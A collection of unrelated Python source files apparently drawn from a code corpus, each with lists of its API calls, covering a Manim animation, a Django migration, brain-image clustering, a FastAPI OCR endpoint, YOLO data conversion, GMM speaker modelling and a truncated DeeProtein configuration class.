self.Universe.Dead.remove(civ) def updateAge(self): past = self.year self.remove(past) self.year = Text(f"{self.Universe.age*10}", aligned_edge=LEFT).set_color(WHITE) self.year.shift(LEFT*6+UP*3) self.add(self.year) def checkChangeAttitude(self): for civ in self.Universe.Civilizations: if civ.Attitude == 1: self.CivGroup[civ][0].set_color(GREEN) elif civ.Attitude == 2: self.CivGroup[civ][0].set_color(RED) elif civ.Attitude == 3: self.CivGroup[civ][0].set_color(YELLOW) else: self.CivGroup[civ][0].set_color(GREY) def label(self): for civ in self.Universe.Civilizations: a = civ.Name[4:] print(a) try: t = Text(a) except Exception: t = Text('No. ????') t.scale(0.2) # t.move_to(civ.transformCoord()+RIGHT*0.4) t.next_to(self.CivGroup[civ][0], direction=RIGHT, ) self.add(t) self.CivLabels[civ] = t self.txts.add(t) def drawIR(self): for civ in self.Universe.Civilizations: IR = Ellipse(width=civ.IRadius*(6.8/self.Universe.Xsize), height=civ.IRadius*(3.886/self.Universe.Ysize), stroke_width=1) past = self.CivGroup[civ][1] self.CivGroup[civ].remove(past) self.remove(past) self.CivGroup[civ].add(IR) IR.move_to(civ.transformCoord()) if civ.Attitude == 1: self.CivGroup[civ][1].set_color(GREEN) elif civ.Attitude == 2: self.CivGroup[civ][1].set_color(RED) elif civ.Attitude == 3: self.CivGroup[civ][1].set_color(YELLOW) else: self.CivGroup[civ][1].set_color(GREY) self.add(IR) # self.wait(0.5) self.wait() def initIR(self, simple=False): for civ in self.Universe.Civilizations: IR = Ellipse(width=civ.IRadius*(6.8/self.Universe.Xsize), height=civ.IRadius*(3.886/self.Universe.Ysize), stroke_width=1) self.CivGroup[civ].add(IR) IR.move_to(civ.transformCoord()) if civ.Attitude == 1: self.CivGroup[civ][1].set_color(GREEN) elif civ.Attitude == 2: self.CivGroup[civ][1].set_color(RED) elif civ.Attitude == 3: self.CivGroup[civ][1].set_color(YELLOW) else: self.CivGroup[civ][1].set_color(GREY) if not simple: self.play(Create(IR)) else: self.add(IR) # self.wait(0.5) self.wait() def initCivs(self,simple=False): if not simple: for civ in self.Universe.Civilizations: self.CivGroup[civ] = VGroup(Dot(point=ORIGIN, radius=0.05)) if civ.Attitude == 1: self.CivGroup[civ][0].set_color(GREEN) elif civ.Attitude == 2: self.CivGroup[civ][0].set_color(RED) elif civ.Attitude == 3: self.CivGroup[civ][0].set_color(YELLOW) else: self.CivGroup[civ][0].set_color(GREY) self.play(FadeIn(self.CivGroup[civ][0])) self.play(ApplyMethod(self.CivGroup[civ][0].move_to, civ.transformCoord()), ) # self.wait(0.1) self.wait(1) else: for civ in self.Universe.Civilizations: self.CivGroup[civ] = VGroup(Dot(point=ORIGIN, radius=0.05)) if civ.Attitude == 1: self.CivGroup[civ][0].set_color(GREEN) elif civ.Attitude == 2: self.CivGroup[civ][0].set_color(RED) elif civ.Attitude == 3: self.CivGroup[civ][0].set_color(YELLOW) else: self.CivGroup[civ][0].set_color(GREY) self.CivGroup[civ][0].move_to(civ.transformCoord()) self.add(self.CivGroup[civ][0]) # Contruct Universe with initial Civilizations # for i in Universe.Civilizations: # CivDot[i] = Dot(point=[i.X, i.Y, 0], radius=0.08, ) # self.play(FadeIn(CivDot[i]))
[ "Galaxy.Galaxy" ]
[((254, 305), 'Galaxy.Galaxy', 'Galaxy.Galaxy', (['GalSizeX', 'GalSizeY', 'GalCivilizations'], {}), '(GalSizeX, GalSizeY, GalCivilizations)\n', (267, 305), False, 'import Galaxy\n')]
# Generated by Django 3.0 on 2020-12-05 01:12 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('register', '0017_auto_20201204_1939'), ] operations = [ migrations.AlterField( model_name='userprofile', name='profile_pic', field=models.ImageField(blank=True, default='profile_images/blank-profile-picture-png.png', null=True, upload_to='profile_images/'), ), ]
[ "django.db.models.ImageField" ]
[((345, 480), 'django.db.models.ImageField', 'models.ImageField', ([], {'blank': '(True)', 'default': '"""profile_images/blank-profile-picture-png.png"""', 'null': '(True)', 'upload_to': '"""profile_images/"""'}), "(blank=True, default=\n 'profile_images/blank-profile-picture-png.png', null=True, upload_to=\n 'profile_images/')\n", (362, 480), False, 'from django.db import migrations, models\n')]
from __future__ import absolute_import, division, print_function import os import sys sys.path.append(os.path.join(os.path.dirname(__file__), "..", "functions")) import time as time import numpy as np import scipy as sp import matplotlib.pyplot as plt from sklearn.feature_extraction.image import grid_to_graph from sklearn.cluster import AgglomerativeClustering from Image_Visualizing import present_3d, make_mask # Relative path to subject 1 data pathtodata = "../../../data/ds009/sub001/" condition_location=pathtodata+"model/model001/onsets/task001_run001/" location_of_images="../../../images/" sys.path.append(os.path.join(os.path.dirname(__file__), "../functions/")) data = np.load('cluster_mask.npy') data_new = data[..., 10:13] X = np.reshape(data_new, (-1, 1)) connectivity = grid_to_graph(n_x= data_new.shape[0], n_y = data_new.shape[1], n_z = data_new.shape[2]) st = time.time() n_clusters = 7 # number of regions ward = AgglomerativeClustering(n_clusters=n_clusters, linkage='ward', connectivity=connectivity).fit(X) label = np.reshape(ward.labels_, data_new.shape) label_mean = np.zeros(n_clusters) center = list() #FIND THE AVERAGE T-VALUE PER CLUSTER for j in range(n_clusters): mask = label==j index = np.where(mask) center.append((np.mean(index[0]),np.mean(index[1]),np.mean(index[2]))) label_mean[j] =np.mean(data_new[mask]) #PRINT THE PLOTS for i in range(data_new.shape[-1]): plt.figure() plt.imshow(data_new[...,i], cmap=plt.cm.gray) for l in range(n_clusters): plt.contour(label[...,i] == l, contours=1, colors=[plt.cm.spectral(l / float(n_clusters)), ],linewidths= 0.4) plt.xticks(()) plt.yticks(()) plt.savefig(location_of_images+"ward"+str(i)+'.png')
[ "matplotlib.pyplot.imshow", "numpy.mean", "sklearn.cluster.AgglomerativeClustering", "numpy.reshape", "matplotlib.pyplot.xticks", "sklearn.feature_extraction.image.grid_to_graph", "numpy.where", "os.path.dirname", "numpy.zeros", "matplotlib.pyplot.figure", "matplotlib.pyplot.yticks", "numpy.load", "time.time" ]
[((687, 714), 'numpy.load', 'np.load', (['"""cluster_mask.npy"""'], {}), "('cluster_mask.npy')\n", (694, 714), True, 'import numpy as np\n'), ((749, 778), 'numpy.reshape', 'np.reshape', (['data_new', '(-1, 1)'], {}), '(data_new, (-1, 1))\n', (759, 778), True, 'import numpy as np\n'), ((795, 882), 'sklearn.feature_extraction.image.grid_to_graph', 'grid_to_graph', ([], {'n_x': 'data_new.shape[0]', 'n_y': 'data_new.shape[1]', 'n_z': 'data_new.shape[2]'}), '(n_x=data_new.shape[0], n_y=data_new.shape[1], n_z=data_new.\n shape[2])\n', (808, 882), False, 'from sklearn.feature_extraction.image import grid_to_graph\n'), ((889, 900), 'time.time', 'time.time', ([], {}), '()\n', (898, 900), True, 'import time as time\n'), ((1056, 1096), 'numpy.reshape', 'np.reshape', (['ward.labels_', 'data_new.shape'], {}), '(ward.labels_, data_new.shape)\n', (1066, 1096), True, 'import numpy as np\n'), ((1111, 1131), 'numpy.zeros', 'np.zeros', (['n_clusters'], {}), '(n_clusters)\n', (1119, 1131), True, 'import numpy as np\n'), ((1247, 1261), 'numpy.where', 'np.where', (['mask'], {}), '(mask)\n', (1255, 1261), True, 'import numpy as np\n'), ((1356, 1379), 'numpy.mean', 'np.mean', (['data_new[mask]'], {}), '(data_new[mask])\n', (1363, 1379), True, 'import numpy as np\n'), ((1441, 1453), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (1451, 1453), True, 'import matplotlib.pyplot as plt\n'), ((1458, 1504), 'matplotlib.pyplot.imshow', 'plt.imshow', (['data_new[..., i]'], {'cmap': 'plt.cm.gray'}), '(data_new[..., i], cmap=plt.cm.gray)\n', (1468, 1504), True, 'import matplotlib.pyplot as plt\n'), ((1670, 1684), 'matplotlib.pyplot.xticks', 'plt.xticks', (['()'], {}), '(())\n', (1680, 1684), True, 'import matplotlib.pyplot as plt\n'), ((1689, 1703), 'matplotlib.pyplot.yticks', 'plt.yticks', (['()'], {}), '(())\n', (1699, 1703), True, 'import matplotlib.pyplot as plt\n'), ((115, 140), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (130, 140), False, 'import os\n'), ((633, 658), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (648, 658), False, 'import os\n'), ((943, 1037), 'sklearn.cluster.AgglomerativeClustering', 'AgglomerativeClustering', ([], {'n_clusters': 'n_clusters', 'linkage': '"""ward"""', 'connectivity': 'connectivity'}), "(n_clusters=n_clusters, linkage='ward', connectivity\n =connectivity)\n", (966, 1037), False, 'from sklearn.cluster import AgglomerativeClustering\n'), ((1281, 1298), 'numpy.mean', 'np.mean', (['index[0]'], {}), '(index[0])\n', (1288, 1298), True, 'import numpy as np\n'), ((1299, 1316), 'numpy.mean', 'np.mean', (['index[1]'], {}), '(index[1])\n', (1306, 1316), True, 'import numpy as np\n'), ((1317, 1334), 'numpy.mean', 'np.mean', (['index[2]'], {}), '(index[2])\n', (1324, 1334), True, 'import numpy as np\n')]
from fastapi import FastAPI, File, Depends, HTTPException from pydantic import BaseModel, Field import base64 import time from recognize_service import RecognizeService app = FastAPI() class Base64Body(BaseModel): b64Encoded: str = Field(..., title="Image encoded in Base64") def get_numbers(file: bytes, recognize_service: RecognizeService): start_time = time.time() try: lp_number, links = recognize_service.get_license_plate_number(file) except Exception as e: print(e) raise HTTPException( status_code=422, detail="Could not get license plate number" ) end_time = time.time() print("Time: ", end_time - start_time) return {"licensePlateNumber": lp_number, "links": links} def process_image_raw( file: bytes = File(...), recognize_service: RecognizeService = Depends(), ): return get_numbers(file, recognize_service) def process_image_base64( b64: Base64Body, recognize_service: RecognizeService = Depends(), ): file = base64.b64decode(b64.b64Encoded) return get_numbers(file, recognize_service) @app.post("/ocr/base64") async def recognize_characters_from_base64( process_image: dict = Depends(process_image_base64), ): return process_image @app.post("/ocr/raw") async def recognize_characters_from_raw_image( process_image: dict = Depends(process_image_raw), ): return process_image @app.get("/") async def healthcheck(): return "ok"
[ "fastapi.FastAPI", "fastapi.HTTPException", "pydantic.Field", "base64.b64decode", "time.time", "fastapi.File", "fastapi.Depends" ]
[((177, 186), 'fastapi.FastAPI', 'FastAPI', ([], {}), '()\n', (184, 186), False, 'from fastapi import FastAPI, File, Depends, HTTPException\n'), ((240, 283), 'pydantic.Field', 'Field', (['...'], {'title': '"""Image encoded in Base64"""'}), "(..., title='Image encoded in Base64')\n", (245, 283), False, 'from pydantic import BaseModel, Field\n'), ((370, 381), 'time.time', 'time.time', ([], {}), '()\n', (379, 381), False, 'import time\n'), ((638, 649), 'time.time', 'time.time', ([], {}), '()\n', (647, 649), False, 'import time\n'), ((798, 807), 'fastapi.File', 'File', (['...'], {}), '(...)\n', (802, 807), False, 'from fastapi import FastAPI, File, Depends, HTTPException\n'), ((851, 860), 'fastapi.Depends', 'Depends', ([], {}), '()\n', (858, 860), False, 'from fastapi import FastAPI, File, Depends, HTTPException\n'), ((1004, 1013), 'fastapi.Depends', 'Depends', ([], {}), '()\n', (1011, 1013), False, 'from fastapi import FastAPI, File, Depends, HTTPException\n'), ((1029, 1061), 'base64.b64decode', 'base64.b64decode', (['b64.b64Encoded'], {}), '(b64.b64Encoded)\n', (1045, 1061), False, 'import base64\n'), ((1207, 1236), 'fastapi.Depends', 'Depends', (['process_image_base64'], {}), '(process_image_base64)\n', (1214, 1236), False, 'from fastapi import FastAPI, File, Depends, HTTPException\n'), ((1363, 1389), 'fastapi.Depends', 'Depends', (['process_image_raw'], {}), '(process_image_raw)\n', (1370, 1389), False, 'from fastapi import FastAPI, File, Depends, HTTPException\n'), ((525, 600), 'fastapi.HTTPException', 'HTTPException', ([], {'status_code': '(422)', 'detail': '"""Could not get license plate number"""'}), "(status_code=422, detail='Could not get license plate number')\n", (538, 600), False, 'from fastapi import FastAPI, File, Depends, HTTPException\n')]
import argparse from datetime import datetime from os.path import join from typing import List, TypeVar, Iterable from docqa.data_processing.word_vectors import load_word_vectors class ResourceLoader(object): """ Abstraction for models the need access to external resources to setup, currently just for word-vectors. """ def __init__(self, load_vec_fn=load_word_vectors): self.load_vec_fn = load_vec_fn def load_word_vec(self, vec_name, voc=None): return self.load_vec_fn(vec_name, voc) class LoadFromPath(object): def __init__(self, path): self.path = path def load_word_vec(self, vec_name, voc=None): return load_word_vectors(join(self.path, vec_name), voc, True) class CachingResourceLoader(ResourceLoader): def __init__(self, load_vec_fn=load_word_vectors): super().__init__(load_vec_fn) self.word_vec = {} def load_word_vec(self, vec_name, voc=None): if vec_name not in self.word_vec: self.word_vec[vec_name] = super().load_word_vec(vec_name) return self.word_vec[vec_name] def print_table(table: List[List[str]]): """ Print the lists with evenly spaced columns """ # print while padding each column to the max column length col_lens = [0] * len(table[0]) for row in table: for i,cell in enumerate(row): col_lens[i] = max(len(cell), col_lens[i]) formats = ["{0:<%d}" % x for x in col_lens] for row in table: print(" ".join(formats[i].format(row[i]) for i in range(len(row)))) T = TypeVar('T') def transpose_lists(lsts: List[List[T]]) -> List[List[T]]: return [list(i) for i in zip(*lsts)] def max_or_none(a, b): if a is None or b is None: return None return max(a, b) def flatten_iterable(listoflists: Iterable[Iterable[T]]) -> List[T]: return [item for sublist in listoflists for item in sublist] def split(lst: List[T], n_groups) -> List[List[T]]: """ partition `lst` into `n_groups` that are as evenly sized as possible """ per_group = len(lst) // n_groups remainder = len(lst) % n_groups groups = [] ix = 0 for _ in range(n_groups): group_size = per_group if remainder > 0: remainder -= 1 group_size += 1 groups.append(lst[ix:ix + group_size]) ix += group_size return groups def group(lst: List[T], max_group_size) -> List[List[T]]: """ partition `lst` into that the mininal number of groups that as evenly sized as possible and are at most `max_group_size` in size """ if max_group_size is None: return [lst] n_groups = (len(lst)+max_group_size-1) // max_group_size per_group = len(lst) // n_groups remainder = len(lst) % n_groups groups = [] ix = 0 for _ in range(n_groups): group_size = per_group if remainder > 0: remainder -= 1 group_size += 1 groups.append(lst[ix:ix + group_size]) ix += group_size return groups def get_output_name_from_cli(): parser = argparse.ArgumentParser(description='') parser.add_argument('--name', '-n', nargs=1, help='name of output to exmaine') args = parser.parse_args() if args.name: out = join(args.name[0] + "-" + datetime.now().strftime("%m%d-%H%M%S")) print("Starting run on: " + out) else: out = "out/run-" + datetime.now().strftime("%m%d-%H%M%S") print("Starting run on: " + out) return out
[ "datetime.datetime.now", "os.path.join", "argparse.ArgumentParser", "typing.TypeVar" ]
[((1570, 1582), 'typing.TypeVar', 'TypeVar', (['"""T"""'], {}), "('T')\n", (1577, 1582), False, 'from typing import List, TypeVar, Iterable\n'), ((3084, 3123), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '""""""'}), "(description='')\n", (3107, 3123), False, 'import argparse\n'), ((700, 725), 'os.path.join', 'join', (['self.path', 'vec_name'], {}), '(self.path, vec_name)\n', (704, 725), False, 'from os.path import join\n'), ((3415, 3429), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (3427, 3429), False, 'from datetime import datetime\n'), ((3297, 3311), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (3309, 3311), False, 'from datetime import datetime\n')]
from os import path, makedirs import os import pandas as pd import sys import argparse IMAGE_FOLDER = 'data/images' DATA_CSV_FILE = 'images/out_data.csv' YOLO_FILE = 'data/train.txt' DATA_CLASSES='data/class.names' def convert_Input_CSV_to_yolo(vott_df,labeldict=dict(zip(['Object'],[0,])),path='',target_name='data_train.txt',abs_path=False): if not 'code' in vott_df.columns: vott_df['code']=vott_df['label'].apply(lambda x: labeldict[x]) for col in vott_df[['xmin', 'ymin', 'xmax', 'ymax']]: vott_df[col]=(vott_df[col]).apply(lambda x: round(x)) #Create Yolo Text file last_image = '' txt_file = '' for index,row in vott_df.iterrows(): if not last_image == row['image']: if abs_path: txt_file +='\n'+row['image_path'] + ' ' else: txt_file +='\n'+os.path.join(path,row['image']) + ' ' txt_file += ','.join([str(x) for x in (row[['xmin', 'ymin', 'xmax', 'ymax','code']].tolist())]) else: txt_file += ' ' txt_file += ','.join([str(x) for x in (row[['xmin', 'ymin', 'xmax', 'ymax','code']].tolist())]) last_image = row['image'] file = open(target_name,"w") file.write(txt_file[1:]) file.close() return True if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument("--IMAGE_FOLDER", type=str, default=IMAGE_FOLDER,help = "Image folder path") parser.add_argument("--DATA_CSV_FILE", type=str, default=DATA_CSV_FILE,help = "Input CSV file that store data") parser.add_argument("--YOLO_FILE", type=str, default=YOLO_FILE,help = "data train yolo file name" ) args = parser.parse_args() multi_df = pd.read_csv(args.DATA_CSV_FILE) labels = multi_df['label'].unique() labeldict = dict(zip(labels,range(len(labels)))) multi_df.drop_duplicates(subset=None, keep='first', inplace=True) train_path = args.IMAGE_FOLDER convert_Input_CSV_to_yolo(multi_df,labeldict,path = train_path,target_name=args.YOLO_FILE) file = open(DATA_CLASSES,"w") SortedLabelDict = sorted(labeldict.items() , key=lambda x: x[1]) for elem in SortedLabelDict: file.write(elem[0]+'\n') file.close()
[ "os.path.join", "argparse.ArgumentParser", "pandas.read_csv" ]
[((1342, 1367), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (1365, 1367), False, 'import argparse\n'), ((1737, 1768), 'pandas.read_csv', 'pd.read_csv', (['args.DATA_CSV_FILE'], {}), '(args.DATA_CSV_FILE)\n', (1748, 1768), True, 'import pandas as pd\n'), ((871, 903), 'os.path.join', 'os.path.join', (['path', "row['image']"], {}), "(path, row['image'])\n", (883, 903), False, 'import os\n')]
#!/usr/bin/env python # vim: set fileencoding=utf-8 : # <NAME> <<EMAIL>> import logging from multiprocessing.pool import ThreadPool import numpy import bob.core import bob.io.base import bob.learn.em from bob.bio.base.algorithm import Algorithm logger = logging.getLogger("bob.bio.gmm") class GMM(Algorithm): """Algorithm for computing Universal Background Models and Gaussian Mixture Models of the features. Features must be normalized to zero mean and unit standard deviation.""" def __init__( self, # parameters for the GMM number_of_gaussians, # parameters of UBM training kmeans_training_iterations=25, # Maximum number of iterations for K-Means gmm_training_iterations=25, # Maximum number of iterations for ML GMM Training training_threshold=5e-4, # Threshold to end the ML training variance_threshold=5e-4, # Minimum value that a variance can reach update_weights=True, update_means=True, update_variances=True, # parameters of the GMM enrollment relevance_factor=4, # Relevance factor as described in Reynolds paper gmm_enroll_iterations=1, # Number of iterations for the enrollment phase responsibility_threshold=0, # If set, the weight of a particular Gaussian will at least be greater than this threshold. In the case the real weight is lower, the prior mean value will be used to estimate the current mean and variance. INIT_SEED=5489, # scoring scoring_function=bob.learn.em.linear_scoring, n_threads=None, ): """Initializes the local UBM-GMM tool chain with the given file selector object""" # call base class constructor and register that this tool performs projection Algorithm.__init__( self, performs_projection=True, use_projected_features_for_enrollment=False, number_of_gaussians=number_of_gaussians, kmeans_training_iterations=kmeans_training_iterations, gmm_training_iterations=gmm_training_iterations, training_threshold=training_threshold, variance_threshold=variance_threshold, update_weights=update_weights, update_means=update_means, update_variances=update_variances, relevance_factor=relevance_factor, gmm_enroll_iterations=gmm_enroll_iterations, responsibility_threshold=responsibility_threshold, INIT_SEED=INIT_SEED, scoring_function=str(scoring_function), multiple_model_scoring=None, multiple_probe_scoring="average", ) # copy parameters self.gaussians = number_of_gaussians self.kmeans_training_iterations = kmeans_training_iterations self.gmm_training_iterations = gmm_training_iterations self.training_threshold = training_threshold self.variance_threshold = variance_threshold self.update_weights = update_weights self.update_means = update_means self.update_variances = update_variances self.relevance_factor = relevance_factor self.gmm_enroll_iterations = gmm_enroll_iterations self.init_seed = INIT_SEED self.rng = bob.core.random.mt19937(self.init_seed) self.responsibility_threshold = responsibility_threshold self.scoring_function = scoring_function self.n_threads = n_threads self.pool = None self.ubm = None self.kmeans_trainer = bob.learn.em.KMeansTrainer() self.ubm_trainer = bob.learn.em.ML_GMMTrainer( self.update_means, self.update_variances, self.update_weights, self.responsibility_threshold, ) def _check_feature(self, feature): """Checks that the features are appropriate""" if ( not isinstance(feature, numpy.ndarray) or feature.ndim != 2 or feature.dtype != numpy.float64 ): raise ValueError("The given feature is not appropriate") if self.ubm is not None and feature.shape[1] != self.ubm.shape[1]: raise ValueError( "The given feature is expected to have %d elements, but it has %d" % (self.ubm.shape[1], feature.shape[1]) ) ####################################################### # UBM training # def train_ubm(self, array): logger.debug(" .... Training with %d feature vectors", array.shape[0]) if self.n_threads is not None: self.pool = ThreadPool(self.n_threads) # Computes input size input_size = array.shape[1] # Creates the machines (KMeans and GMM) logger.debug(" .... Creating machines") kmeans = bob.learn.em.KMeansMachine(self.gaussians, input_size) self.ubm = bob.learn.em.GMMMachine(self.gaussians, input_size) # Trains using the KMeansTrainer logger.info(" -> Training K-Means") # Reseting the pseudo random number generator so we can have the same initialization for serial and parallel execution. self.rng = bob.core.random.mt19937(self.init_seed) bob.learn.em.train( self.kmeans_trainer, kmeans, array, self.kmeans_training_iterations, self.training_threshold, rng=self.rng, pool=self.pool, ) variances, weights = kmeans.get_variances_and_weights_for_each_cluster(array) means = kmeans.means # Initializes the GMM self.ubm.means = means self.ubm.variances = variances self.ubm.weights = weights self.ubm.set_variance_thresholds(self.variance_threshold) # Trains the GMM logger.info(" -> Training GMM") # Reseting the pseudo random number generator so we can have the same initialization for serial and parallel execution. self.rng = bob.core.random.mt19937(self.init_seed) bob.learn.em.train( self.ubm_trainer, self.ubm, array, self.gmm_training_iterations, self.training_threshold, rng=self.rng, pool=self.pool, ) def save_ubm(self, projector_file): """Save projector to file""" # Saves the UBM to file logger.debug(" .... Saving model to file '%s'", projector_file) hdf5 = ( projector_file if isinstance(projector_file, bob.io.base.HDF5File) else bob.io.base.HDF5File(projector_file, "w") ) self.ubm.save(hdf5) def train_projector(self, train_features, projector_file): """Computes the Universal Background Model from the training ("world") data""" [self._check_feature(feature) for feature in train_features] logger.info( " -> Training UBM model with %d training files", len(train_features) ) # Loads the data into an array array = numpy.vstack(train_features) self.train_ubm(array) self.save_ubm(projector_file) ####################################################### # GMM training using UBM # def load_ubm(self, ubm_file): hdf5file = bob.io.base.HDF5File(ubm_file) # read UBM self.ubm = bob.learn.em.GMMMachine(hdf5file) self.ubm.set_variance_thresholds(self.variance_threshold) def load_projector(self, projector_file): """Reads the UBM model from file""" # read UBM self.load_ubm(projector_file) # prepare MAP_GMM_Trainer kwargs = ( dict( mean_var_update_responsibilities_threshold=self.responsibility_threshold ) if self.responsibility_threshold > 0.0 else dict() ) self.enroll_trainer = bob.learn.em.MAP_GMMTrainer( self.ubm, relevance_factor=self.relevance_factor, update_means=True, update_variances=False, **kwargs ) self.rng = bob.core.random.mt19937(self.init_seed) def project_ubm(self, array): logger.debug(" .... Projecting %d feature vectors" % array.shape[0]) # Accumulates statistics gmm_stats = bob.learn.em.GMMStats(self.ubm.shape[0], self.ubm.shape[1]) self.ubm.acc_statistics(array, gmm_stats) # return the resulting statistics return gmm_stats def project(self, feature): """Computes GMM statistics against a UBM, given an input 2D numpy.ndarray of feature vectors""" self._check_feature(feature) return self.project_ubm(feature) def read_gmm_stats(self, gmm_stats_file): """Reads GMM stats from file.""" return bob.learn.em.GMMStats(bob.io.base.HDF5File(gmm_stats_file)) def read_feature(self, feature_file): """Read the type of features that we require, namely GMM_Stats""" return self.read_gmm_stats(feature_file) def enroll_gmm(self, array): logger.debug(" .... Enrolling with %d feature vectors", array.shape[0]) gmm = bob.learn.em.GMMMachine(self.ubm) gmm.set_variance_thresholds(self.variance_threshold) bob.learn.em.train( self.enroll_trainer, gmm, array, self.gmm_enroll_iterations, self.training_threshold, rng=self.rng, pool=self.pool, ) return gmm def enroll(self, feature_arrays): """Enrolls a GMM using MAP adaptation, given a list of 2D numpy.ndarray's of feature vectors""" [self._check_feature(feature) for feature in feature_arrays] array = numpy.vstack(feature_arrays) # Use the array to train a GMM and return it return self.enroll_gmm(array) ###################################################### # Feature comparison # def read_model(self, model_file): """Reads the model, which is a GMM machine""" return bob.learn.em.GMMMachine(bob.io.base.HDF5File(model_file)) def score(self, model, probe): """Computes the score for the given model and the given probe using the scoring function from the config file""" assert isinstance(model, bob.learn.em.GMMMachine) assert isinstance(probe, bob.learn.em.GMMStats) return self.scoring_function( [model], self.ubm, [probe], [], frame_length_normalisation=True )[0][0] def score_for_multiple_probes(self, model, probes): """This function computes the score between the given model and several given probe files.""" assert isinstance(model, bob.learn.em.GMMMachine) for probe in probes: assert isinstance(probe, bob.learn.em.GMMStats) # logger.warn("Please verify that this function is correct") return self.probe_fusion_function( self.scoring_function( [model], self.ubm, probes, [], frame_length_normalisation=True ) ) class GMMRegular(GMM): """Algorithm for computing Universal Background Models and Gaussian Mixture Models of the features""" def __init__(self, **kwargs): """Initializes the local UBM-GMM tool chain with the given file selector object""" # logger.warn("This class must be checked. Please verify that I didn't do any mistake here. I had to rename 'train_projector' into a 'train_enroller'!") # initialize the UBMGMM base class GMM.__init__(self, **kwargs) # register a different set of functions in the Tool base class Algorithm.__init__( self, requires_enroller_training=True, performs_projection=False ) ####################################################### # UBM training # def train_enroller(self, train_features, enroller_file): """Computes the Universal Background Model from the training ("world") data""" train_features = [feature for client in train_features for feature in client] return self.train_projector(train_features, enroller_file) ####################################################### # GMM training using UBM # def load_enroller(self, enroller_file): """Reads the UBM model from file""" return self.load_projector(enroller_file) ###################################################### # Feature comparison # def score(self, model, probe): """Computes the score for the given model and the given probe. The score are Log-Likelihood. Therefore, the log of the likelihood ratio is obtained by computing the following difference.""" assert isinstance(model, bob.learn.em.GMMMachine) self._check_feature(probe) score = sum( model.log_likelihood(probe[i, :]) - self.ubm.log_likelihood(probe[i, :]) for i in range(probe.shape[0]) ) return score / probe.shape[0] def score_for_multiple_probes(self, model, probes): raise NotImplementedError("Implement Me!")
[ "logging.getLogger", "bob.bio.base.algorithm.Algorithm.__init__", "numpy.vstack", "multiprocessing.pool.ThreadPool" ]
[((261, 293), 'logging.getLogger', 'logging.getLogger', (['"""bob.bio.gmm"""'], {}), "('bob.bio.gmm')\n", (278, 293), False, 'import logging\n'), ((7120, 7148), 'numpy.vstack', 'numpy.vstack', (['train_features'], {}), '(train_features)\n', (7132, 7148), False, 'import numpy\n'), ((9856, 9884), 'numpy.vstack', 'numpy.vstack', (['feature_arrays'], {}), '(feature_arrays)\n', (9868, 9884), False, 'import numpy\n'), ((11800, 11888), 'bob.bio.base.algorithm.Algorithm.__init__', 'Algorithm.__init__', (['self'], {'requires_enroller_training': '(True)', 'performs_projection': '(False)'}), '(self, requires_enroller_training=True,\n performs_projection=False)\n', (11818, 11888), False, 'from bob.bio.base.algorithm import Algorithm\n'), ((4674, 4700), 'multiprocessing.pool.ThreadPool', 'ThreadPool', (['self.n_threads'], {}), '(self.n_threads)\n', (4684, 4700), False, 'from multiprocessing.pool import ThreadPool\n')]
import logging from tkinter import ttk from modlunky2.ui.widgets import Tab logger = logging.getLogger("modlunky2") class ErrorTab(Tab): def __init__(self, tab_control, *args, **kwargs): super().__init__(tab_control, *args, **kwargs) self.tab_control = tab_control self.rowconfigure(0, weight=1) self.columnconfigure(0, weight=1) self.label = ttk.Label( self, text="Failed to load this tab... See console for more details." ) self.label.grid(row=1, column=0, pady=5, padx=5, sticky="nswe")
[ "logging.getLogger", "tkinter.ttk.Label" ]
[((88, 118), 'logging.getLogger', 'logging.getLogger', (['"""modlunky2"""'], {}), "('modlunky2')\n", (105, 118), False, 'import logging\n'), ((394, 479), 'tkinter.ttk.Label', 'ttk.Label', (['self'], {'text': '"""Failed to load this tab... See console for more details."""'}), "(self, text='Failed to load this tab... See console for more details.'\n )\n", (403, 479), False, 'from tkinter import ttk\n')]
import matplotlib matplotlib.use('Agg') import tensorflow as tf import numpy as np import re, os import random import math import json import tarfile import matplotlib.pyplot as plt import sklearn.metrics from seaborn import barplot, set_style from sklearn.preprocessing import OneHotEncoder from collections import OrderedDict from matplotlib import font_manager class OptionHandler(): """This Class holds all the Options from the config.JSON. The Attributes of this class are directly accessed by DeeProtein, the BatchGenerator, the ROCtracker and the TFrecordsgenerator. Attributes: config: A `dict` holding all the global paramters. This is read from config.JSON. _name: A `str` holding the model name. _thresholdnum: `int32`, nr of thresholds to use to calculate the ROC/PR metrics. _gpu: `int32`, which gpu to use in multiGPU context. _allowsoftplacement: `str` if 'True' the Variables can be moved to CPU. _numepochs: `int32` the number of epochs to calculate. DEPREACTED. Use numsteps instead. _numsteps: `int32` the number of steps to run the model. _embeddingdim: `int32` the dimension of the protein embedding generated by Deeprotein.generate_embedding(). _depth: `int32` the depth the nr of amino acids. Defaults to 20. _structuredims: `int32` the nr of structural elements to consider in the structure embedding. _traindata: `str` the path to the traindataset. _validdata: `str` the path to the validdataset. _batchesdir: `str` the path to the examples directory. _inferencemode: `str` if 'True' model is initialized in inference mode. _labels: `str` the type od labels to use must be one of ['EC' or 'GO']. Until now only 'GO' is fully implemented. _nclasses: `int32` the number of classes to consider. This number must match the line number in the EC_file. _classbalancing: `str` if 'True' the classes are weighted for their size/their importance during training. _maxclassinbalance: `int32` the maximum weight a class can obtain. _dropoutrate: `float32` the dropout to assign to fully connected layers. _learningrate: `float32` the learningrate. _epsilon: `float32` the epsilon parameter of the Adam optimizer. _batchsize: `int32` the bacthsize to apply in trainig and validation mode. _batchgenmode: `str` currently only one option is available: 'one_hot_padded' _windowlength: `int32` the length of the window to apply on a sequence. _minlength: `int32` the minlength a sequence must have to be included in the dataset. _numthreads: `int32` the number of threads to use in the inputpipeline. _restorepath: `int32` the path from which to restore the model. _restore: `str` if 'True' the model is restored from the path specified in the restorepath. _debug: `str` if 'True' the model is initialized in the debug mode. _ec_file: `str` the path to the EC_file, holding all labels and the label sizes. _summariesdir: `str` the directory where to store the model and to write the summaries. """ def __init__(self, config_dict): self.config = config_dict self._name = config_dict['model_name'] self._thresholdnum 